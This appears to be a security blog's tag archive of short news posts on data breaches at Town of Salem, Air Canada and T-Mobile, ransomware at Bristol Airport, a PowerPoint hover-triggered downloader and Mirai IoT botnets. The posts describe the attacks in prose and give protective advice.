Tag Archives: cyber attack

Popular Online Game ‘Town of Salem’ Suffers Data Breach Exposing 7.6 Million Players

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based online role-playing game.

The Discovery

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server and database access.

DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features also had billing data compromised.

The Breach

The attackers used a Local File Execution/Remote File Execution (LFI/RFI) attack that injects malicious code into a web server running PHP, DeHashed said.

The attackers then gained unauthorized access to the complete gamer database which contained 7,633,234 unique email addresses (most were Gmail, Hotmail, and Yahoo.com email accounts).

BMG’s Response

A BlankMediaGames developer named Achilles responded on the Town of Salem forums that no credit-card numbers were stolen. Further, Achilles wrote, all passwords were hashed and not stored in plain text.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Moving Forward

Data is becoming a much larger issue for game developers; just last month, Bethesda Game Studios came under fire for a bug that leaked player information from support tickets.

If you’ve played Town of Salem, you should change your password immediately.

 

Bristol Airport Cyber Attack Leaves Passengers and Airport Staff Scrambling

Airline travelers at Bristol Airport, the UK’s ninth largest airport which handles more than 8 million passengers a year, were forced to read departure times off old-fashioned whiteboards due to technical issues caused by a recent cyber-attack.

Airport officials confirmed the airport was subject to an opportunistic ransomware attack, a type of malicious software which encrypts (“kidnaps”) user data unless a ransom is paid.

The Ransomware Attack

Ransomware (also called cyber extortion) is a type of malware (i.e. malicious software) designed to hijack your computer by locking your important files and forcing you to pay a ransom to unlock the files.  Cyber criminals infect your computer with ransomware by tricking you into clicking on a malicious email attachment that downloads the ransomware or by visiting a ransomware-carrying website.

Furthermore, a growing number of attacks have used remote desktop protocol and other approaches that don’t rely on any form of user interaction to cause the ransomware infection. Continue reading Bristol Airport Cyber Attack Leaves Passengers and Airport Staff Scrambling

Air Canada – The Latest Company Compromised by Data Breach

Air Canada, the largest airline of Canada by fleet size and passengers carried, has reported a massive data breach of its app, putting thousands of passenger passport details, among other personal information, at risk.

Air Canada’s Response

The airline issued a warning to mobile app users that their personal data may have been compromised in a cyberattack. This may placs those who entered their details at risk of identity theft. It is believed approximately 20,000 customers may have had their data stolen. All Air Canada app users have been asked to change their passwords.

Profile data, such as names, email addresses, passport numbers, genders and dates of birth, among others, can all be stored in the airline’s app – making this stored data a potential target in the attack. Continue reading Air Canada – The Latest Company Compromised by Data Breach

Over 2 Million Customers Affected by T-Mobile Data Breach

T-Mobile is warning customers of a data breach that occurred in late August 2018. The company reported to Motherboard that hackers stole the personal data of over 2 million people during the incident.

T-Mobile’s Response

T-Mobile released an official statement saying it quickly shut down a cyberattack on their database, but the incident may have exposed the personal data of 2.3 million of its 77 million customers, or slightly less than 3% of customers.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you. None of your financial data – including credit card information – or Social Security numbers were involved, and no passwords were compromised.” Continue reading Over 2 Million Customers Affected by T-Mobile Data Breach

Hovering Over the Link Leads to Malware

Most people are familiar with the commonly-held Internet myth… “Don’t click the link. Hover your mouse over and all will be fine.”

Thanks to the “PowerPoint Mouseover Based Downloader,” simply hovering over a malicious link is now all it takes for attackers to conquer your computer. No macros, JavaScript, or VBA needed.

Attack Details

This attack leverages Windows PowerShell and PowerPoint to execute.

Take your typical social engineering scenario where a user is sent an email with a PowerPoint attachment. Users who open the document are shown the text “Loading…Please wait” in the form of a familiar blue hyperlink:

Since we are all trained not to click on links we don’t know, the user chooses to hover over the link to see where the URL leads.

One ‘feature’ in PowerPoint is that it supports a hover event or action on links. So in this case, when a user hovers their mouse over the text, they are faced with the following screen:

Enabling the content executes PowerShell and the attackers win.

Dodge This Security explains how attackers leverage this for remote access to the computer:

“When that PowerShell is executed it reaches out to the domain “cccn.nl” for a c.php file and downloads it to disk as a file named “ii.jse” in the temp folder.

That gets executed in wscript.exe and then that drops a file named “168.gop” which the JavaScript then executes certutil.exe with the -decode parameter. certutil.exe then supplies 168.gop as the file to decode and saves it in the temp folder as “484.exe”.

Then “484.exe” is executed and it spawns mstsc.exe to allow RDP access to the system.

After this 484.exe was observed being renamed and saved to AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe by mstsc.exe and then it gets re-executed from the new location.

A .bat file was observed being written to disk then executed in cmd.exe. The purpose of this bat file appears to have been to change the attributes of the sectcms.exe program to be hidden, marked as a system file and set as read only.

It also deletes any of the files with the following extensions in the temp folder .txt/.exe/.gop/.log/.jse to get rid of any obvious tracks left behind.”

What can you do to protect yourself?

The typical “patch” solution is not applicable in this case because the issue is not a bug… it’s a PowerPoint feature.

Instead, IT admin can start by updating Office installations on all endpoints. From there implementing a group policy is the next line of defense. Through the policy, ensure all Office documents always open in protected view by default. Then raise awareness by notifying end users of the attack and what to look for.

Users should already be wary about opening Office documents as attachments in emails. And if they do, they should use extra caution before leaving protected mode.

IoT Botnets Pose Big DDoS Threat

 

Internet of things concept and Cloud computing technology Smart Home Technology Internet networking concept. Internet of things cloud with apps.Cloud computing technology device.Cloud Apps

With the rapid expansion of Internet of Things (IoT) devices and their stark lack of security, cyber criminals have a plethora of devices to recruit for their botnets. Botnets are networks of connected devices infected with malware.

Botnets are often collectively used to launch Distributed Denial of Service (DDoS) attacks. With the mass quantities of IoT devices connected to the Internet, the new trend for cyber criminals is to infect these devices and use them in coordinated attacks.

DDoS Attack

Recently, a security blogger, Brian Krebs, was the target of a massive DDoS attack. A DDoS attack is where a network is flooded with requests in order to overload the system and make it unable to respond to legitimate requests, basically taking down a website.

The Krebs attack was one of the largest DDoS attacks on record at over 620 Gbps. The attack sparks interest because it was launched by a botnet of IoT devices powered by Mirai malware.

Mirai malware infects a device and starts the process by removing all other competing malware on the device. Then it scans the Internet for other vulnerable devices to add to its botnet. Once a new device is found, it uses a brute force dictionary attack with a short list of common default usernames and passwords to gain access. Apparently, 380,000 IoT devices infected with Mirai were used in the Krebs attack.

The Mirai malware’s source code has since been released on the Internet, so there’s a good chance we’ll see this problem expanding with more IoT botnets forming. After attacking Krebs’ blog, a Mirai botnet is credited with the massive attack on the Internet service provider Dyn, which took down several major websites in the process.

Vulnerable IoT Devices

The security industry has identified this as a major problem for quite some time. Most IoT devices have huge security concerns and can easily be leveraged in these coordinated attacks. For now, the IoT botnets primarily consist of routers, network-enabled cameras, or printers.

The main reason malware like Mirai is so effective is that most IoT devices never have the default credential changed. Default usernames and passwords for many devices can be found on the Internet, making it easy for them to be compromised.

Mitigation

To remove Mirai malware from an infected IoT device:

  • Disconnect the device from the network.
  • Perform a reboot. Mirai malware exists in dynamic memory, so rebooting clears the malware.
  • Change the password for the device. Make sure the default password is changed and use a strong password.
  • Reconnect to the network.

Prevention

To prevent Mirai malware from infecting your IoT devices:

  • Ensure all default passwords are changed to strong passwords.
  • Update IoT devices with patches as soon as possible. This isn’t always applicable, as many IoT devices don’t push security patches.
  • Disable Universal Plug and Play on routers unless it’s absolutely necessary.
  • Monitor IP port 2323/TCP and port 23/TCP for attempts to gain unauthorized control using the network terminal protocol.
  • Look for suspicious traffic on port 48101. Infected devices often attempt to spread malware using port 48101.

[Mitigation and prevention measures referenced from the US-CERT alert here.]